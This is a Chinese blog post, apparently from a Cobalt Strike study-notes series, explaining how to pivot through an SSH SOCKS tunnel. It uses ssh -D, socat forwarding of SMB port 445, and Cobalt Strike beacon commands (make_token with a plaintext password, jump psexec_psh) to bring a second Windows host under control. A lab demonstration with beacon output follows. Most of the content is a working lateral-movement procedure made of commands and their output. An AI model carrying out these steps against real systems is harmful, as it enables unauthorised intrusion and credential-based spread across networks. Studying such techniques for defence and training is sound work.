ubuntu 开启ssh_「CS学习笔记」22、通过SSH开通通道

0x00 前言

这一节将来介绍如何通过 SSH 通道进行攻击。

0x01 通过 SSH 建立通道

56167fc640f2e3fbcdabfbc36144ae30.png

1、连接到上图中蓝色区域里的 PIVOT 主机并开启端口转发

 ssh -D 1080 user@

该命令中的 -D 参数会使 SSH 建立一个 socket,并去监听本地的 1080 端口,一旦有数据传向那个端口,就自动把它转移到 SSH 连接上面,随后发往远程主机。

2、在红色区域的 PIVOT 主机上开启通过 SSH Socks 的 445 端口转发

 socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1::445

socat 可以理解成 netcat 的加强版。socat 建立 socks 连接默认端口就是 1080 ,由于我们上面设置的就是 1080,因此这里不需变动。如果设置了其他端口,那么这里还需要在命令最后加上 ,socksport= 指定端口才行。

3、在攻击者控制的主机上运行 beacon,使其上线

 注意需要使用 administrator 权限运行 beacon

4、在上线的主机上运行以下命令

 make_token [DOMAINuser] [password] jump psexec_psh  [listener]

整体的流程就是下面这张图一样。

913ac1246a78e1e20584837f5dcaed7f.png

0x02 演示

我在本地搭建了这样的一个环境。

af41e7807e214b4153aa31d5cddc5717.png
  1. 首先使 Win1 主机上线,接着在 Linux1 主机上通过 SSH 连接到 Linux2 主机。
 ssh -D 1080 user@192.168.175.146
 > ssh -D 1080 user@192.168.175.146 user@192.168.175.146's password:  Last login: Fri Jul 31 20:00:54 2020 from 192.168.175.1 user@ubuntu:~$ 

2、在 Linux1 主机上开启 445 端口转发

 socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:192.168.232.132:445

3、在 Win1 主机上运行以下命令使 Win2 上线

 make_token teamssixadministrator Test123! jump psexec_psh 192.168.175.200 smb
beacon> make_token teamssixadministrator Test123![*] Tasked beacon to create a token for teamssixadministrator[+] host called home, sent: 61 bytes[+] Impersonated WINTESTAdministratorbeacon> jump psexec_psh 192.168.175.200 smb[*] Tasked beacon to run windows/beacon_bind_pipe (.pipemsagent_532c) on 192.168.175.200 via Service Control Manager (PSH)[+] host called home, sent: 5886 bytes[+] received output:Started service 4aea3b9 on 192.168.175.200[+] host called home, sent: 204473 bytes[+] established link to child beacon: 192.168.232.132

4、随后便可以看到通过 SSH 上线的主机

1972b6c2acf31ebcfee98cb567f9d4cd.png
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值